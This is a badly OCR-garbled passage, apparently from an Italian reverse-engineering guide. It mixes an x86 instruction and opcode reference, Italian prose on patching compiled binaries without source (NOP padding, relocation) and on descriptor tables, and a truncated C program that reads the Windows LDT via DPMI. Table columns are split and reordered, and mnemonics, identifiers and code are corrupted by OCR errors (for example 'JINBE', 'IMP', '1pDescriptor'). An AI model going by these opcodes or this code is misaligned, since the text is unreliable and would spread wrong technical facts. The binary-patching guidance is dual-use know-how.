Compare bytes DS:[SI] - ES:[DI], advance SI,DI 
Compare dwords DS:[SI] - ES:[DI], advance SI,DI 
Compare words DS:[SI] - ES:[DI], advance SI,DI 


If EDXEAX=mq then mq:=ECXEBX, else EAXEDX:=mq 

If AL=eb then set eb to rb, else set AL to eb 

If eAX=ev then set ev to rv, else set eAX to ev 
If EAX=1 set EDXEAX to CPU identification values 
Convert word to doubleword (DX = top bit of AX) 
Sign-extend word AX to doubleword EAX 

Use CS segment for the following memory reference 


Decimal adjust AL after addition 
Decimal adjust AL after subtraction 
Decrement EA byte by 1 

Decrement EA vword by 1 

Decrement vword register by 1 


Unsigned divide AX by EA byte (AL=Quo AH=Rem) 
Unsigned divide eDXeAX by EA vword (eAX=Quo eDX=Rem) 
Use DS segment for the following memory reference 


Make stack frame, iw bytes local storage, 0 levels 
Make stack frame, iw bytes local storage, 1 level 
Make stack frame, iw bytes local storage, ib levels 
Use ES segment for the following memory reference 
Floating point set is in Chapter 7 

Halt 


Signed divide AX by EA byte (AL=Quo AH=Rem) 

Signed divide eDXeAX by EA vword (eAX=Quo eDX=Rem) 
Signed multiply (AX = AL * EA byte) 

Signed multiply (eDXeAX = eAX * EA vword) 

Signed multiply ev into rv 

Signed multiply imm byte into vword register 
Signed multiply imm vword into vword register 
Signed multiply (rv = EA vword * imm vword) 

Signed multiply (rv = EA vword * imm byte) 


Input byte from immediate port into AL 
Input byte from port DX into AL 

Input vword from immediate port into eAX 
Input vword from port DX into eAX 


Increment EA byte by 1 
Increment EA vword by 1 
Increment vword register by 1 


Input byte from port DX into [DI], advance DI 
Input vword from port DX into [DI], advance DI 
Input byte from port DX into ES:[DI], advance DI 
Input dword from port DX into ES:[DI], advance DI 
Input vword from port DX into ES:[DI], advance DI 


Interrupt 3 (trap to debugger) (far call, with flags 
Interrupt numbered by immediate byte pushed first) 
Interrupt 4 if overflow flag is 1 

Invalidate the Data Cache without writing 

Invalidate the TLB Entry that points tom 

Interrupt return (far return and pop flags) 

Interrupt return (pop EIP, ECS, Eflags) 


Jump short if above (CF=0 and ZF=0) above=UNSIGNED 


cv 


/r 


33/r 


3B/0 ib 


ch 
ch 
ch 
ch 
cb 


03 
B2 
00 


iv 


/r 
/r 
/3 


JAE ch 
JB cb 
JBE cb 
JC ch 


JICXZ cb 
JE cb 
JECXZ ch 
JG ch 
JGE cb 
JL ch 
JLE ch 


IMP cb 
IMP cp 
IMP cv 


3 


Jcond LONG cv 3 


JMP ev 
JMP md 


JNA cb 
JNAE cb 
JNB cb 
JINBE cb 
INC ch 


JNE cb 
JING ch 
JINGE ch 
JNL cb 
JINLE cb 


JNO cb 
JINP cb 
JINS cb 
JINZ cb 
JO cb 


JP cb 
JPE cb 
JPO cb 
IS ch 
IZ ch 


LAHF 

LAR rv, ew 
LDS rv,ep 
LEA rv,m 

LEAVE 

LES rv, ep 
LFS rv, ep 


LGDT m 

LGS rv,ep 
LIDT m 

LLDT ew 

LMSW ew 

LOCK (prefix) 


LODBITS rb,rb 


2 


NNNWN 


LODBITS rb,ib N 


LODS mb 
LODS mv 
LODSB 
LODSD 
LODSW 


LOOP cb 

LOOPE cb 
LOOPNE cb 
LOOPNZ cb 
LOOPZ cb 


LSL rv,ev 
LSS rv,ep 
LTR ew 


MOV AL,xb 


NGN 


Jump short if above or equal (CF=0) 

Jump short if below (CF=1) below=UNSIGNED 
Jump short if below or equal (CF=1 or ZF=1) 

Jump short if carry (CF=1) 


Jump short if CX register is zero 

Jump short if equal (ZF=1) 

Jump short if ECX register is zero 

Jump short if greater (ZF=0 and SF=0F) greater=SIGNED 
Jump short if greater or equal (SF=0F) 

Jump short if less (SF>OF) less=SIGNED 
Jump short if less or equal (ZF=1 or SF>O0F) 


Jump short (signed byte relative to next instruction) 
Jump far (4- or 6-byte immediate address) 

Jump near (vword offset relative to next instruction) 
Jump, if condition, to offset >127 away 

Jump near to EA vword (absolute offset) 

Jump far (4-byte address in memory doubleword) 


Jump short if not above (CF=1 or ZF=1) 

Jump short if not above or equal (CF=1) 

Jump short if not below (CF=0) 

Jump short if not below or equal (CF=0 and ZF=0) 
Jump short if not carry (CF=0) 


Jump short if not equal (ZF=0) 

Jump short if not greater (ZF=1 or SF>0F) 

Jump short if not greater or equal (SF>OF) 

Jump short if not less (SF=0F) 

Jump short if not less or equal (ZF=0 and SF=0F) 


Jump short if not overflow (0F=0) 
Jump short if not parity (PF=0) 
Jump short if not sign (SF=0) 
Jump short if not zero (ZF=0) 
Jump short if overflow (0F=1) 


Jump short if parity (PF=1) 

Jump short if parity even (PF=1) 
Jump short if parity odd (PF=0) 
Jump short if sign (SF=1) 

Jump short if zero (ZF=1) 


Load: AH = flags SF ZF xx AF xx PF xx CF 

Load: high(rw) = Access Rights byte, selector ew 
Load EA pointer into DS and vword register 
Calculate EA offset given by m, place in rv 

Set SP to BP, then POP BP (reverses previous ENTER) 
Load EA pointer into ES and vword register 

Load EA pointer into FS and vword register 


Load 6 bytes at m into Global Descriptor Table reg 
Load EA pointer into GS and vword register 

Load 6 bytes into Interrupt Descriptor Table reg 
Load selector ew into Local Descriptor Table reg 
Load EA word into Machine Status Word 

Assert BUSLOCK signal for the next instruction 


Load AX with DS:SI,bit rb (incr. SI,rb), rb+1 bits 
Load AX with DS:SI,bit rb (incr. SI,rb), ib+1 bits 
Load byte [SI] into AL, advance SI 

Load vword [SI] into eAX, advance SI 

Load byte [SI] into AL, advance SI 

Load dword [SI] into EAX, advance SI 

Load word [SI] into AX, advance SI 


noflags DEC CX; jump short if Cx>0 

noflags DEC CX; jump short if CX>0 and equal (ZF=1) 
noflags DEC CX; jump short if CX>0 and not equal 
noflags DEC CX; jump short if CX>0 and ZF=0 
noflags DEC CX; jump short if CX>0 and zero (ZF=1) 


Load: rv = Segment Limit, selector ew 
Load EA pointer into SS and vword register 
Load EA word into Task Register 


Move byte variable (offset iv) into AL 


1E/0 ib 
1F/0 ib 


/4 
/n 


/n 
/n 
/n 


ib 


iv 


ib 


/4 
/n 


/n 
/n 
/n 
iv 


/r 
/r 
/r 
/r 


nil 


nil 


ib 


ib 
iv 


MOV 
MOV 
MOV 


MOV 
MOV 
MOV 


MOV 
MOV 
MOV 
MOV 


MOV 
MOV 
MOV 
MOV 
MOV 


MOV 
MOV 
MOV 
MOV 
MOV 


MOV 
MOV 
MOV 


CAX, xv 
CR4,rd 
CRn, rd 


DRn, rd 
DRn, rd 
TRn, rd 


eb, ib 
eb,rb 
ev, iv 
ev, rv 


ew, segreg 
rb,ib 
rb,eb 

rd, CR4 
rd,CRn 


rd, DRn 
rd, DRn 
rd, TRn 
rv, iv 
rv, ev 


segreg, mw 
xb, AL 
XV, eAX 


MOVS mb, mb 
MOVS mv, mv 
MOVSB 
MOVSD 
MOVSW 


MOVSX rd,ew 
MOVSX rv, eb 
MOVZX rd,ew 
MOVZX rv,eb 
MOVZX rw, seg 


MUL 
MUL 
NEG 
NEG 
NIL 
NOP 


NOT 
NOT 


eb 
ev 
eb 
ev 
(prefix) 


eb 
ev 


NOTBIT eb, CL 
NOTBIT ew, CL 
NOTBIT eb, ib 
NOTBIT ew,ib 


(prefix) 
(prefix) 


OR AL, ib 


OUT 
OUT 
OUT 
OUT 


eAX, iv 
eb, ib 
eb,rb 
ev,ib 
ev, iv 
ev, rv 
rb,eb 
rv, ev 


ib, AL 
ib, eAX 
DX, AL 
DX, eAX 


OUTS DX, eb 
OUTS DX, ev 
OUTSB 
OUTSD 
OUTSW 


POP 
POP 


DS 
ES 


U d W 


U VW VW 


VW WWW 


PWPEPH 


Move vword variable (offset iv) into eAX 
Move rd into control register 4 
Move rd into control register n (=0,2, or 3) 


Move rd into debug register n (=0,1,2,3) 
Move rd into debug register n (=6,7) 
Move rd into test register TRn (=6,7) 


Move immediate byte into EA byte 
Move byte register into EA byte 
Move immediate vword into EA vword 
Move vword register into EA vword 


Move segment register into EA word 

Move immediate byte into byte register 

Move EA byte into byte register 

Move control register 4 into rd 

Move control register n (=0,2, or 3) into rd 


Move debug register n (=0,1,2,3) into rd 
Move debug register n (=6,7) into rd 
Move test register TRn (=6,7) into rd 
Move immediate vword into vword register 
Move EA vword into vword register 


Move EA word into segment register (except CS) 
Move AL into byte variable (offset iv) 

Move eAX into vword register (offset iv) 

Move byte [SI] to ES:[DI], advance SI,DI 

Move vword [SI] to ES:[DI], advance SI,DI 
Move byte DS:[SI] to ES:[DI], advance SI,DI 
Move dword DS:[SI] to ES:[DI], advance SI,DI 
Move word DS:[SI] to ES:[DI], advance SI,DI 


Move word to dword, with sign-extend 
Move byte to vword, with sign-extend 
Move word to dword, with zero-extend 
Move byte to vword, with zero-extend 
Move segment register into EA word 


Unsigned multiply (AX = AL * EA byte) 
Unsigned multiply (eDXeAX = eAX * EA vword) 
Two's complement negate EA byte 

Two's complement negate EA vword 

Special "do-nothing" opcode assembles no code 
No Operation 


Reverse each bit of EA byte 
Reverse each bit of EA word 
Complement bit CL of eb 
Complement bit CL of ew 
Complement bit ib of eb 
Complement bit ib of ew 


Use 16-bit data operand in the next instruction 
Use 32-bit data operand in the next instruction 
Logical-OR immediate byte into AL 

Logical-OR immediate word into eAX 

Logical-OR immediate byte into EA byte 
Logical-OR byte register into EA byte 
Logical-OR immediate byte into EA word 
Logical-OR immediate word into EA word 
Logical-OR word register into EA word 
Logical-OR EA byte into byte register 
Logical-OR EA word into word register 


Output byte AL to immediate port number ib 

Output word eAX to immediate port number ib 

Output byte AL to port number DX 

Output word eAX to port number DX 

Output byte [SI] to port number DX, advance SI 
Output word [SI] to port number DX, advance SI 
Output byte DS:[SI] to port number DX, advance SI 
Output dword DS:[SI] to port number DX, advance SI 
Output word DS:[SI] to port number DX, advance SI 


Set DS to top of stack, increment SP by 2 
Set ES to top of stack, increment SP by 2 


/2 ib 


/2 ib 


/3 ib 


/3 ib 


POP 
POP 
POP 
POP 
POP 


POPA 
POPA 
POPF 
POPF 


PUSH 
PUSH 
PUSH 
PUSH 
PUSH 
PUSH 
PUSH 
PUSH 
PUSH 
PUSH 


FS 
GS 
mv 
rv 
SS 


D 


D 


PUSHA 
PUSHAD 


PUSH 
PUSH 


RCL 
RCL 
RCL 
RCL 
RCL 
RCL 


RCR 
RCR 
RCR 
RCR 
RCR 
RCR 
RDMS 
RDTS 


REP (prefix) 
REPC (prefix) 
REPE (prefix) 
REPNC (prfix) 
REPNE (prfix) 
REPNZ (prfix) 
REPZ (prefix) 


RETF 
RET 
RETF 
RET 


ROL 
ROL 
ROL 
ROL 
ROL 
ROL 
ROL4 


ROR 
ROR 
ROR 
ROR 
ROR 
ROR 
ROR4 
RSM 


SAHF 
SAL 
SAL 
SAL 
SAL 


F 
FD 


eb,1 
eb, CL 
eb, ib 
ev,1 
ev, CL 
ev,ib 


eb,1 
eb, CL 
eb, ib 
ev,1 
ev, CL 
ev,ib 
R 

C 


iw 
iw 


eb,1 
eb, CL 
eb, ib 
ev,1 
ev, CL 
ev,ib 
eb 


eb,1 
eb, CL 
eb, ib 
ev,1 
ev, CL 
ev,ib 
eb 


eb,1 
eb, CL 
eb, ib 
ev,1 


PpwWw 


DzhHw 


Set FS to top of stack, increment SP by 2 
Set GS to top of stack, increment SP by 2 
Set memory word to top of stack, increment SP by 2 

Set word register to top of stack, increment SP by 2 
Set SS to top of stack, increment SP by 2 


Pop DI,SI,BP,SP,BX,DX,CX,AX (SP value is ignored) 
Pop EDI,ESI,EBP,x,EBX,EDX,ECX,EAX (ESP ign.) 
Set flags register to top of stack, increment SP by 2 
Set eflags reg to top of stack, incr SP by 2 


Set [SP-2] to CS, 
Set [SP-2] to DS, 
Set [SP-2] to ES, 
Set [SP-2] to FS, 
Set [SP-2] to GS, 


Push sign-extended immediate byte 


the 
the 
the 
the 
the 


n decrement 
n decrement 
n decrement 
n decrement 
n decrement 


SP by 
SP by 
SP by 
SP by 
SP by 


2 
2 
2 
2 
2 


Set [SP-2] to immediate word, then decrement SP by 2 
Set [SP-2] to memory word, then decrement SP by 2 

Set [SP-2] to word register, then decrement SP by 2 
Set [SP-2] to SS, then decrement SP by 2 


Push AX, CX, DX 


,BX, original SP,BP,SI,DI 


Push EAX, ECX, EDX, EBX, original ESP, EBP, ESI, EDI 
Set [SP-2] to flags register, then decrement SP by 2 
Set [SP-4] to eflags reg, then decr SP by 4 


Rotate 
Rotate 
Rotate 
Rotate 
Rotate 
Rotate 


Rotate 
Rotate 
Rotate 
Rotate 
Rotate 
Rotate 


Read Model Specific Reg #ECX to EDXEAX 


9-bit quantity (CF, EA byte) left once 
9-bit quantity (CF, EA byte) left CL times 
9-bit quantity (CF, EA byte) left ib times 
v+1-bit quantity (CF, EA word) left once 
v+1-bit quantity (CF, EA word) left CL times 
v+1-bit quantity (CF, EA word) left ib times 


9-bit quantity (CF, EA byte) right once 
9-bit quantity (CF, EA byte) right CL times 
9-bit quantity (CF, EA byte) right ib times 


v+1-bit quantity (CF, EA word) right once 


v+1-bit quantity (CF, EA word) right CL times 
v+1-bit quantity (CF, EA word) right ib times 


Read Time Stamp Counter to EDXEAX 


Repeat 
Repeat 
Repeat 
Repeat 
Repeat 
Repeat 
Repeat 


Return 
Return 


following 
following 
following 
following 
following 
following 
following 


MOVS, LODS, STOS, INS, 


CMPS 
CMPS 
CMPS 
CMPS 
CMPS 
CMPS 


or 
or 
or 
or 
or 
or 


SCAS 
SCAS 
SCAS 
SCAS 
SCAS 
SCAS 


CX 
Cx 
Cx 
Cx 
CX 
Cx 


times 
times 
times 
times 
times 
times 


to far caller (pop offset, then 


to near caller (pop offset only) 


RET (far), pop offset, seg, iw bytes 
RET (near), pop offset, iw bytes pushed before Call 


Rotate 
Rotate 
Rotate 
Rotate 
Rotate 
Rotate 
Rotate 


Rotate 
Rotate 
Rotate 
Rotate 
Rotate 
Rotate 
Rotate 
Resume 


Store AH 
Multiply 
Multiply 
Multiply 
Multiply 


8-bit EA byte 
8-bit EA byte 
8-bit EA byte 


16- or 32- 
16- or 32- 
16 or 32-bit EA vword left ib times 


bit 
bit 


left once 


left CL times 
left ib times 


EA vword left once 


or 
or 
or 
or 
or 
or 


or OUTS CX 


until 
until 
until 
until 
until 
until 


seg) 


EA vword left CL times 


nibbles: Heb=Leb 


8-bit EA byte 
8-bit EA byte 
8-bit EA byte 


16- or 32- 
16- or 32- 
16- or 32- 


bit 
bit 
bit 


HAL, Leb=LAL LAL=Heb 


right once 
right CL times 
right ib times 
EA vword right once 
EA vword right CL times 
EA vword right ib times 


nibbles: Leb=Heb 
from System Management mode 


into flags 
EA byte by 2, once 
EA byte by 2, CL times 
EA byte by 2, ib times 
EA vword by 2, once 


Heb=LAL AL=eb 


SF ZF xx AF xx PF xx CF 


times 
CF=0 
ZF=0 
CF=1 
ZF=1 
ZF=1 
ZF=0 


/4 ib 


/7 ib 


/7 ib 


/3 ib 


/3 ib 
/3 iv 


A5/r 


AD/r 
AC/r ib 


01 /1 


00 /0 
01 /4 


31/r 
39/0 ib 


00 /1 


/5 ib 


/5 ib 
/5 iv 


SAL ev,CL 
SAL ev,ib 


SAR eb,1 
SAR eb, CL 
SAR eb, ib 
SAR ev,1 
SAR ev, CL 
SAR ev, ib 


SBB AL, ib 
SBB eAX,iv 
SBB eb,ib 
SBB eb,rb 
SBB ev, ib 
SBB ev, iv 
SBB ev,rv 
SBB rb,eb 
SBB rv,ev 


SCAS mb 
SCAS mv 
SCASB 
SCASD 
SCASW 


SETBIT eb,CL 
SETBIT ew,CL 
SETBIT eb,ib 
SETBIT ew,ib 
SETcond eb 
SGDT m 


SHL eb,1 
SHL eb,CL 
SHL eb,ib 
SHL ev,1 
SHL ev,CL 
SHL ev,ib 


SHLD ev,rv,CL 
SHLD ev,rv,ib 


SHR eb,1 
SHR eb, CL 
SHR eb, ib 
SHR ev,1 
SHR ev, CL 
SHR ev, ib 
SHRD ev,rv,CL 
SHRD ev,rv,ib 


SIDT m 
SLDT ew 


STOBITS rb,rb 
STOBITS rb,ib 
STOS mb 

STOS mv 

STOSB 

STOSD 

STOSW 

STR ew 


SUB AL, ib 
SUB eAX,iv 
SUB eb,ib 
SUB eb,rb 
SUB ev,ib 
SUB ev, iv 
SUB ev,rv 
SUB rb,eb 
SUB rv, ev 


NwWwazzzz 


3 
3 


Multiply EA vword by 2, CL times 
Multiply EA vword by 2, ib times 


Signed d 
Signed d 
Signed d 
Signed d 
Signed d 
Signed d 


Subtract 
Subtract 
Subtract 
Subtract 
Subtract 
Subtract 
Subtract 
Subtract 
Subtract 


Compare 
Compare 
Compare 
Compare 
Compare 


Set bit 
Set bit 
Set bit 
Set bit 


ivide EA 
ivide EA 
ivide EA 
ivide EA 
ivide EA 
ivide EA 


with borrow 
with borrow 
with borrow 
with borrow 
with borrow 
with borrow 
with borrow 
with borrow 
with borrow 


byte by 2, 
byte by 2, 
byte by 2, 
vword by 2, once 

vword by 2, CL times 
vword by 2, ib times 


once 
CL times 
ib times 


immediate byte from AL 
immediate word from eAX 
immediate byte from EA byte 
byte register from EA byte 
immediate byte from EA word 
immediate word from EA word 
word register from EA word 
EA byte from byte register 
EA word from word register 


bytes AL - ES:[DI], advance DI 


vwords eAX - ES:[DI], advance DI 


bytes AL - ES:[DI], advance DI 


dwords EAX - ES:[DI], advance DI 
AX - ES:[DI], advance DI 


words 


CL of eb 
CL of ew 
ib of eb 
ib of ew 


Set eb byte to 1 if 
Store 6-byte Global 


Multiply 
Multiply 
Multiply 
Multiply 
Multiply 
Multiply 


EA byte 
EA byte 
EA byte 
EA word 
EA word 
EA word 


condition, 0 if not 


Descriptor Table register to M 


2, 
2, 
2, 
2, 
2, 
2, 


Set ev to high of ((ev, 
Set ev to high of ((ev,rv) 


Unsigned 
Unsigned 
Unsigned 
Unsigned 
Unsigned 
Unsigned 


Set ev to low of ((rv,ev) SHR 
Set ev to low of ((rv,ev) SHR 


Store 6-byte Interrupt Descriptor Table register to M 
Store Local Descriptor Table register to EA word 


divide 
divide 
divide 
divide 
divide 
divide 


byte 
byte 
byte 
word 
word 
word 


once 


CL times 
ib times 


once 


CL times 
ib times 


rv) SHL CL) 
SHL ib) 


2, 
2, 
2, 
2, 
2, 


2, 


once 
CL times 
ib times 
once 

CL times 
ib times 
CL) 

ib) 


Store Machine Status Word to EA word 


Use SS segment for the following memory reference 


Set carr 


Set direction flag so SI and DI will decrement 
Set interrupt enable flag, interrupts enabled 


Store AX to ES:DI,bit rb (incr. DI,rb), rb+1 bits 
Store AX to ES:DI,bit rb (incr. DI,rb), ib+1 bits 


y flag 


Store AL to byte [DI], advance DI 
Store eAX to word [DI], advance DI 
Store AL to byte ES:[DI], advance DI 
Store EAX to dword ES:[DI], advance DI 
Store AX to word ES:[DI], advance DI 


Store Task Register to EA word 


Subtract 
Subtract 
Subtract 
Subtract 
Subtract 
Subtract 
Subtract 
Subtract 
Subtract 


immediate byte from AL 
immediate word from eAX 
immediate byte from EA byte 
byte register from EA byte 
immediate byte from EA word 
immediate word from EA word 
word register from EA word 
EA byte from byte register 
EA word from word register 


OF 22 SUBA4S N 
A8 ib TEST AL,ib 

A9 iv TEST eAX,iv 

F6 /0 ib TEST eb,ib 

84 /r TEST eb,rb 

F7 /0 iv TEST ev,iv 

85 /r TEST ev,rv 

84 /r TEST rb,eb 

85 /r TEST rv,ev 

OF 10/0 TESTBIT eb,CL N 
OF 11/0 TESTBIT ev,CL N 
OF 18/0 ib TESTBIT eb,ib N 
OF 19/0 ib TESTBIT ew,ib N 
OF 00 /4 VERR ew 2 
OF 00 /5 VERW ew 2 
9B WAIT 

OF 09 WBINVD 4 
OF 30 WRMSR 5 
OF CO /r XADD eb,rb 4 
OF C1 /r XADD ev,rv 4 
9r XCHG eAX,rv 

86 /r XCHG eb,rb 

87 /r XCHG ev,rv 

86 /r XCHG rb,eb 

9r XCHG rv, eAX 

87 /r XCHG rv,ev 

D7 XLAT mb 

D7 XLATB 

34 ib XOR AL, ib 

35 iv XOR eAX,iv 

80 /6 ib XOR eb, ib 

30 /r XOR eb,rb 

83 /6 ib XOR ev, ib 

81 /6 iv XOR ev,iv 

31 /r XOR ev,rv 

32 /r XOR rb, eb 

33 /r XOR rv, ev 


Una nota particolare riguarda i 


Sub 


AND 
AND 
AND 
AND 
AND 
AND 
AND 
AND 


Test bit 
Test bit 
Test bit 
Test bit 


Set ZF=1 
Set ZF=1 


EA byte 
EA word 


immediate byte into AL for flags only 

immediate word into eAX for flags only 

immediate byte into EA byte for flags only 
byte register into EA byte for flags only 
immediate word into EA word for flags only 
word register into EA word for flags only 
into byte register for flags only 
into word register for flags only 


CL 
CL 
ib 
ib 


of eb, 
of ew, 
of eb, 
of ew, 


set Z flag 
set Z flag 
set Z flag 
set Z flag 


if 
if 


Wait until BUSY pin is inactive (HIGH) 
Write Back and Invalidate the Data Cache 
Write EDXEAX to Model Specific Reg #ECX 


Exchange 
Exchange 


Exchange 
Exchange 
Exchange 
Exchange 
Exchange 
Exchange 


eb with rb then add into new eb 
ev with rv then add into new ev 


word register with eAX 
byte register with EA byte 
word register with EA word 
EA byte with byte register 
with word register 

EA word with word register 


Set AL to memory byte [BX + unsigned AL] 
Set AL to memory byte DS:[BX + unsigned AL] 


Exclusive-OR 
Exclusive-OR 
Exclusive-OR 
Exclusive-OR 
Exclusive-OR 
Exclusive-OR 
Exclusive-OR 
Exclusive-OR 
Exclusive -OR 


come ad esempio jne, je ecc. 


immediate byte into AL 
immediate word into eAX 
immediate byte into EA byte 
byte register into EA byte 
immediate byte into EA word 
immediate word into EA word 
word register into EA word 
EA byte into byte register 
EA word into word register 


Jxx - Jump Instructions Table 


Mnemonic 
JA 
JAE 
JB 
JBE 
JC 


ICXZ 
JE 
JG 
JGE 
JL 
JLE 
JMP 


JNA 
JNAE 
JNB 
JNBE 
JNC 
JNE 
JNG 


JNGE 


Jump 
Jump 
Jump 
Jump 
Jump 


Jump 
Jump 
Jump 
Jump 
Jump 
Jump 


if 
if 
if 
if 
if 


if 
if 
if 
if 
if 
if 


Meaning 


Above 
Above or Equal 
Below 
Below or Equal 
Carry 


CX Zero 

Equal 

Greater (signed) 

Greater or Equal (signed) 
Less (signed) 

Less or Equal (signed) 


Unconditional Jump 


Jump 
Jump 
Jump 
Jump 
Jump 
Jump 
Jump 


Jump 


if 
if 
if 
if 
if 
if 
if 


Not 
Not 
Not 
Not 
Not 
Not 
Not 


if Not 


Above 

Above or Equal 
Below 

Below or Equal 
Carry 

Equal 

Greater (signed) 


codici relativi ai salti 


CL nibbles BCD, DS:SI - ES:DI (CL even,NZ) 


segment can be read, selector ew 
segment can be written to, selector ew 


a seguito di controlli 


Jump Condition 
CF=0 and ZF=0 
CF=0 
CF=1 
CF=1 or ZF=1 
CF=1 


Cx=0 

ZF=1 

ZF=0 and SF=0F 
SF=0F 

SF != OF 

ZF=1 or SF != OF 
unconditional 


CF=1 or ZF=1 
CF=1 
CF=0 
CF=0 and ZF=0 
CF=0 
ZF=0 


ZF=1 or SF != OF 


Greater or Equal (signed) SF != OF 


JNL Jump if Not Less (signed) SF=0F 
JINLE Jump if Not Less or Equal (signed) ZF=0 and SF=0F 


JNO Jump if Not Overflow (signed) OF=0 
JNP Jump if No Parity PF=0 
INS Jump if Not Signed (signed) SF=0 
JINZ Jump if Not Zero ZF=0 
JO Jump if Overflow (signed) OF=1 
JP Jump if Parity PF=1 
JPE Jump if Parity Even PF=1 
JPO Jump if Parity Odd PF=0 
IS Jump if Signed (signed) SF=1 
IZ Jump if Zero ZF=1 
Clocks Size 
Operands 808x 286 386 486 Bytes 
Jx: jump 16 7+m 7+m 3 2 
no jump 4 3 3 1 
Jx near-label - - 7+m 3 4 
no jump - - 3 1 


- It's a good programming practice to organize code so the 
expected case is executed without a jump since the actual 
jump takes longer to execute than falling through the test. 


- see JICXZ and JMP for their respective timings 


Bisogna fare un discorso particolare a riguardo di alcune tecniche di 
riempimento. 

Quando disponiamo del codice sorgente eseguiamo la modifica e ricompiliamo 
tutto. 

Nel nostro caso non avremo mai a ddisposizione i sources per cui le modifiche 
dovremo apportarle a file binari gi compilati. 

Nella memoria esistono dati e codici operativi. 

Il processore come fa ad interpretare in un modo o nell'altro queste 
informazioni ? 

Quando il processore inizia l’esecuzione del codice i registri CS:IP puntano 
all'istruzione corrente da eseguire. 

Questa viene presa e riconosciuta in base al codice operativo, quelli visti 
prima. 

Ogni istruzione dispone di una lunghezza particolare per cui l’interprete del 
microcodice, all’interno del processore, aggiorna IP a puntare all’istruzione 
successiva spostando l’indirizzo precedente di n bytes ovvero quanti erano 
quelli relativi alla lunghezza dell’istruzione eseguita. 

Se noi andiamo a modificare delle istruzioni è possibile che quelle che 
inseriamo non siano di lunghezza in bytes uguali a quella precedente. 

In questo caso tutto il programma andrebbe a farsi benedire in quanto lo 
sfasamento sarebbe differente. 

Facciamo un esempio pratico. 

Supponiamo che ci sia un istruzione di lunghezza di due bytes e dopo un’altra di 
lunghezza x. 

Originariamente il processore leggerebbe il codice operativo dell'istruzione , 
la seguirebbe e successivamente inserirebbe in CS:IP l’indirizzo corrente + 2 
bytes (la lunghezza dell’sitruzione eseguita) per cu leggerebbe l’istruzione 
dopo. 

Se noi andiamo a sostituire la prima ed inseriamoun istruzione di un solo byte 
il processore dopo la lettura e l'esecuzione della prima istruzione cercherebbe 
di leggere l’istruzione all’indirizzo corrente + 1 byte leggendo qualche codice 
dovuto alla sporcizia di memoria. 

Quando andiamo ad inserire istruzioni di lunghezza non corretta dobbiamo 
compensare con istruzioni nulle la memoria. 

Questa istruzione nulla (NO OPERATION) e’ 


NOP Nessuna operazione 90 


Questa è la casistica che capita quando la sostituzione è relativa a codici pi 
corti rispetto agli originali. 

Nel caso in cui invece il codice da inserire sia pi lungo dovremo eseguire delle 
operazioni di rilocazione. 

Vedremo alcune funzioni con i programmi generatori di patch. 


Altre note devono essere trattate a riguardo delle differenze tra modo protetto 
e modo reale. 

Esiste una tabella chiamata GDT (Global Descriptor Table) che contiene i 
descrittori dei segmenti di base. 

Questi sono relativi a differenti parti di memoria. 

Nelle pagine precedenti avevamo detto che in modo reale i segmenti potevano 
essere lunghi 64Kbytes. 

In modo protetto ogni segmento può essere grosso fino a 4 Gbytes. 

Un'altra tabella opzionale, utilizzata per le applicazioni, è chiamata LDT 
(Local Descriptor Table) e contiene i descrittori dei segmenti. 

Un sistema operativo setta le informazioni dentro al GDT e per ogni applicativo 
setta un LDT che contiene i descrittori dell’applicazione. 

In ogni caso LDT è una tabella di descrittori tipo GDT. 

Il suo uso è quello di provvedere a task differenti layouts di memoria diversi. 
Un'altra tabella è IDT la quale contiene i descrittori degli interrupts. 

Questa tabella viene utilizzata per dire al processore dove trovare gli handlers 
degli interrupts. 

IDT contiene una voce per ogni interrupt, come in modo reale, ma il formato di 
queste voci è totalmente differente. 


Il programma che segue riesce sfruttando LDT a mostrare le informazioni sui vari 
segmenti alloicati dai processi attivi. 


#include <windows. h> 
#include <string.h> 


#pragma pack(1) // Need to make sure this struct is packed all together 
// Structure definition laying out the fields of a regular 

// (non-system) descriptor. 

typedef struct 


unsigned short limit _0_ 15; 
unsigned short base _0_15; 
unsigned char base_16_23; 


unsigned int accessed I 
unsigned int readable 1; 
unsigned int conforming : 1; 
unsigned int code_data 1; 
unsigned int app_system : 1; 
unsigned int dpl Zi 
unsigned int present 1; 
unsigned int limit_16_19 : 4; 
unsigned int unused ai 
unsigned int always_0 "1; 
unsigned int seg_16_32 ni 
unsigned int granularity : 1; 


unsigned char base_24_31; 
} DESCRIPTOR; 
#pragma pack() // Revert to default packing 
static char MS_DOS_STR[] = "MS-DOS"; // String needed to get DPMI extensions 


// Returns a pointer to the LDT alias selector that KRNL386 uses to read 


// and write the LDT with. This selector comes from the DPMI server 
unsigned short GetLDTAlias(void) 


{ 
unsigned short LDT_ alias; 
unsigned short (far * dpmiproc)(void); 
// Use INT 2Fh, fn. 168A to get the "DPMI extensions 
// entry point" function pointer 
_asm mov si, offset MS_DOS_STR // DS:SI = "MS-DOS" 
_asm mov ax, 168Ah 
_asm int 2Fh 
_asm cmp al, 8Ah 
_asm je extensions_not_found 
// The entry point is returned in ES:DI. Save it 
_asm MOV word ptr [dpmiproc], di 
_asm MOV word ptr [dpmiproc+2], es 
// Call the extensions with AX == 0x100. The LDT alias 
// selector is return in AX. Carry flag is set on failure. 
_asm mov ax, 100h 
LDT_alias = dpmiproc(); 
_asm jc extensions_not_found; 
return LDT_alias; 
extensions_not_found: // We get here if something failed 
return 0; 
i; 
void ListNotPresentSelectors(HWND hwndDlg) 
{ 


DESCRIPTOR FAR * lpDescriptor; 
char szBuffer[260]; 

char szFilename[260]; 

LPSTR lpszBaseFilename; 
unsigned i, ldtSelectorCount; 
unsigned cCode=0, cData=0; 


// Get a pointer to the start of the LDT 
lpDescriptor = MAKELP(GetLDTAlias(), 0); 
if ( !1pDescriptor ) 


MessageBox(hwndDlg, "Unable to find LDT", 0, MB_0K); 
return; 


} 


// The alias selector that allows access to the LDT can have a limit 
// of less than 64K to prevent poking around in the unused upper 
// reaches. Therefore, we need to figure out how many DESCRIPTOR 


// entries can fit within the limit of the LDT alias 


ldtSelectorCount = (WORD)GetSelectorLimit( SELECTOROF(lpbescriptor) ) 


/ sizeof(DESCRIPTOR); 


// Iterate through each descriptor of the LDT (or at least every selector 


// that we're allowed to look at) 
for ( i=0; i < ldtSelectorCount; i++ ) 


// If it's a not present descriptor and at ring 3, do our thing 
if ( !(lpDescriptor->present) && (lpDescriptor->dpl == 3) ) 


// Get the owner's filename. 


if ( GetModuleFileName(lpDescriptor->limit_0_15, szFilename, 


sizeof(szFilename)) == 0 ) 
{ 
// GetModuleFileName() failed. The selector's owner 
isn't 
// an HMODULE, so format a string with the owning PSP 
wsprintf(szFilename, "allocated by PSP %04X", 
